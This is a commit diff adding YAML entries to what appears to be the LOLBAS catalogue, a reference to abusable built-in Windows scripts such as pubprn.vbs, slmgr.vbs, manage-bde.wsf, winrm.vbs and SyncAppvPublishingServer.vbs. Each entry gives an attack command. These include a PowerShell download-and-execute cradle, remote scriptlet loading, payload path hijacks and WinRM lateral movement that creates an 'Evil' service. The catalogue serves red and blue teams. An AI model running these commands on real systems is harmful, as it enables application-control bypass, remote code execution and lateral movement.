MD files generate from Script, and adjustments to readme

yml/OSScripts/CL_mutexverifiers.yml

@@ -0,0 +1,18 @@
+---
+Name: CL_Mutexverifiers.ps1
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: ". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1   \nrunAfterCancelProcess calc.ps1"
+    Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
+Full Path:
+  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+  - C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
+  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/995111125447577600
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)

yml/OSScripts/Cl_invocation.yml

@@ -0,0 +1,20 @@
+---
+Name: CL_Invocation.ps1
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1   \nSyncInvoke <executable> [args]
+    Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.
+Full Path:
+  - C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
+  - C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
+  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
+Code Sample: []
+Detection: []
+Resources:
+  - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
+  - https://twitter.com/bohops/status/948548812561436672
+  - https://twitter.com/pabraeken/status/995107879345704961
+Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)

yml/OSScripts/Manage-bde.yml

@@ -0,0 +1,19 @@
+---
+Name: Manage-bde.wsf
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
+    Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.
+  - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
+    Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
+Full Path:
+  - C:\Windows\System32\manage-bde.wsf
+Code Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
+  - https://twitter.com/bohops/status/980659399495741441
+Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)

yml/OSScripts/Pubprn.yml

@@ -0,0 +1,20 @@
+---
+Name: Pubprn.vbs
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
+    Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection.
+Full Path:
+  - C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
+  - C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
+Code Sample:
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Pubprn_calc.sct
+Detection: []
+Resources:
+  - https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
+  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - https://github.com/enigma0x3/windows-operating-system-archaeology
+Notes: Thanks to Matt Nelson - @enigma0x3

yml/OSScripts/Slmgr.yml

@@ -0,0 +1,20 @@
+---
+Name: Slmgr.vbs
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
+    Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
+Full Path:
+  - c:\windows\system32\slmgr.vbs
+  - c:\windows\sysWOW64\slmgr.vbs
+Code Sample:
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct
+Detection: []
+Resources:
+  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - https://www.youtube.com/watch?v=3gz1QmiMhss
+Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee

yml/OSScripts/Syncappvpublishingserver.yml

@@ -0,0 +1,17 @@
+---
+Name: SyncAppvPublishingServer.vbs
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
+    Description: Inject PowerShell script code with the provided arguments
+Full Path:
+  - C:\Windows\System32\SyncAppvPublishingServer.vbs
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/monoxgas/status/895045566090010624
+  - https://twitter.com/subTee/status/855738126882316288
+Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee

yml/OSScripts/Winrm.yml

@@ -0,0 +1,28 @@
+---
+Name: Winrm.vbs
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
+    Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
+  - Command: winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985
+    Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol.
+  - Command: winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
+    Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol.
+Full Path:
+  - C:\windows\system32\winrm.vbs
+  - C:\windows\SysWOW64\winrm.vbs
+Code Sample:
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct
+Detection: []
+Resources:
+  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - https://www.youtube.com/watch?v=3gz1QmiMhss
+  - https://github.com/enigma0x3/windows-operating-system-archaeology
+  - https://redcanary.com/blog/lateral-movement-winrm-wmi/
+  - https://twitter.com/bohops/status/994405551751815170
+Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)
+

yml/OSScripts/pester.yml

@@ -0,0 +1,18 @@
+---
+Name: pester.bat
+Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload.
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Pester.bat [/help|?|-?|/?] "$null; notepad"
+    Description: Execute notepad
+Full Path:
+  - c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
+  - c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/Oddvarmoe/status/993383596244258816
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md
+Notes: Thanks to Emin Atac - @p0w3rsh3ll